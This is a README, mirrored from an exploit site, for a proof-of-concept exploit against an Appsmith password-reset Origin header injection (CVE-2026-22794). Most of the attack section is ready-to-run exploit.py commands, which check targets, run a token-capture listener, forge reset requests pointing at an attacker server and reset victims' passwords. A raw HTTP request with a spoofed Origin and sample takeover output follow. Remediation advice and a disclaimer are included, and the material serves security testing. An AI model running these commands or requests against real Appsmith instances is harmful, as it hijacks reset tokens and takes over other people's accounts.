Share
## https://sploitus.com/exploit?id=5A212BE7-810A-511B-A3F3-64A65F40DEDB
# CVE-2026-22794 - Appsmith Origin Header Injection

[![Python Version](https://img.shields.io/badge/python-3.7%2B-blue)](https://www.python.org/)
[![CVE](https://img.shields.io/badge/CVE-2026--22794-red)](https://cve.mitre.org/)
[![License](https://img.shields.io/badge/license-MIT-green)](LICENSE)

## ๐Ÿ”ด Critical Security Vulnerability

**Password Reset Link Hijacking via Origin Header Manipulation**

This repository contains a Proof of Concept (PoC) exploit for CVE-2026-22794, a critical vulnerability in Appsmith that allows attackers to hijack password reset tokens and achieve full account takeover.

## ๐Ÿ“‹ Vulnerability Summary

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-22794 |
| **Affected Software** | Appsmith (versions prior to patch) |
| **Vulnerability Type** | Origin Header Injection |
| **Impact** | Full Account Takeover |
| **CVSS Score** | 9.1 (Critical) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | Required (victim clicks link) |

## ๐ŸŽฏ Vulnerability Description

Appsmith uses the HTTP `Origin` header without validation to construct password reset and email verification URLs. The vulnerable code directly assigns the Origin header to the password reset base URL:

```java
userPasswordDTO.setBaseUrl(originHeader);
```

This allows an attacker to:
1. Trigger a password reset for any email address
2. Inject a malicious Origin header pointing to an attacker-controlled server
3. Capture the password reset token when the victim clicks the link
4. Use the token to reset the victim's password and take over their account

## ๐Ÿ”ฅ Attack Chain

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                     ATTACK FLOW                                  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”                    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”                    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
  โ”‚ ATTACKER โ”‚                    โ”‚ APPSMITH โ”‚                    โ”‚  VICTIM  โ”‚
  โ””โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”˜                    โ””โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”˜                    โ””โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”˜
       โ”‚                               โ”‚                               โ”‚
       โ”‚ 1. POST /forgotPassword       โ”‚                               โ”‚
       โ”‚    Origin: attacker.com       โ”‚                               โ”‚
       โ”‚    email: victim@corp.com     โ”‚                               โ”‚
       โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€>โ”‚                               โ”‚
       โ”‚                               โ”‚                               โ”‚
       โ”‚                               โ”‚ 2. Send email with            โ”‚
       โ”‚                               โ”‚    attacker.com/reset?token   โ”‚
       โ”‚                               โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€>โ”‚
       โ”‚                               โ”‚                               โ”‚
       โ”‚ 3. Victim clicks link         โ”‚                               โ”‚
       โ”‚โ”‚                               โ”‚
       โ”‚                               โ”‚                               โ”‚
       โ”‚ 6. ACCOUNT TAKEOVER! โœ“        โ”‚                               โ”‚
       โ”‚                               โ”‚                               โ”‚
```

## ๐Ÿ“ฆ Installation

```bash
# Clone the repository
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Install dependencies
pip install -r requirements.txt
```

## ๐Ÿš€ Usage

### Check if target is vulnerable

```bash
python exploit.py --target https://appsmith.target.com --check
```

### Start token capture server

```bash
python exploit.py --listen --port 8080
```

### Send malicious password reset request

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --email victim@company.com \
    --attacker-url https://your-server.com
```

### Full automated attack

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --email victim@company.com \
    --attacker-url https://your-server.com \
    --listen --port 8080
```

### Use captured token to reset password

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"
```

## ๐Ÿ“ธ Attack Demonstration

### Step 1: Attacker sends malicious request
```http
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "victim@company.com"
}
```

### Step 2: Victim receives email with malicious link
```
Password Reset Link: https://attacker-server.com/user/resetPassword?token=abc123xyz...
```

### Step 3: Attacker captures token
```
[+] INCOMING REQUEST CAPTURED!
[*] Path: /user/resetPassword?token=abc123xyz789...
[!!!] PASSWORD RESET TOKEN CAPTURED!
[!!!] Token: abc123xyz789...
```

### Step 4: Account takeover
```
[+] ACCOUNT TAKEOVER SUCCESSFUL!
[+] Password has been reset to: NewP@ssw0rd!
```

## ๐Ÿ›ก๏ธ Remediation

Organizations using Appsmith should:

1. **Update immediately** to the latest patched version
2. **Validate Origin headers** against a whitelist of allowed domains
3. **Use server-side configuration** for generating password reset URLs
4. **Implement additional verification** (e.g., IP validation, short token expiry)

### Secure Code Example

```java
// โŒ VULNERABLE CODE
userPasswordDTO.setBaseUrl(originHeader);

// โœ… SECURE CODE
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Or validate against whitelist
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);
```

## ๐Ÿ“ Repository Structure

```
CVE-2026-22794/
โ”œโ”€โ”€ README.md           # This file
โ”œโ”€โ”€ exploit.py          # Main exploit script
โ”œโ”€โ”€ requirements.txt    # Python dependencies
โ”œโ”€โ”€ LICENSE             # MIT License
โ””โ”€โ”€ docs/
    โ””โ”€โ”€ technical_analysis.md  # Detailed vulnerability analysis
```

## โš ๏ธ Legal Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. 

- Only use this tool against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse of this tool
- Always follow responsible disclosure practices

## ๐Ÿ“„ References

- [CVE-2026-22794](https://vulners.com/cve/CVE-2026-22794)
- [OWASP - Forgot Password Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html)
- [CWE-346: Origin Validation Error](https://cwe.mitre.org/data/definitions/346.html)

## ๐Ÿ‘ค Author

**Security Researcher**

- GitHub: [@MalikHamza7](https://github.com/MalikHamza7)
- LinkedIn: [Your LinkedIn Profile](https://www.linkedin.com/in/muhammad-hamza-iqbal-0b4413293/)

## ๐Ÿ“œ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

โญ **If you found this useful, please star the repository!** โญ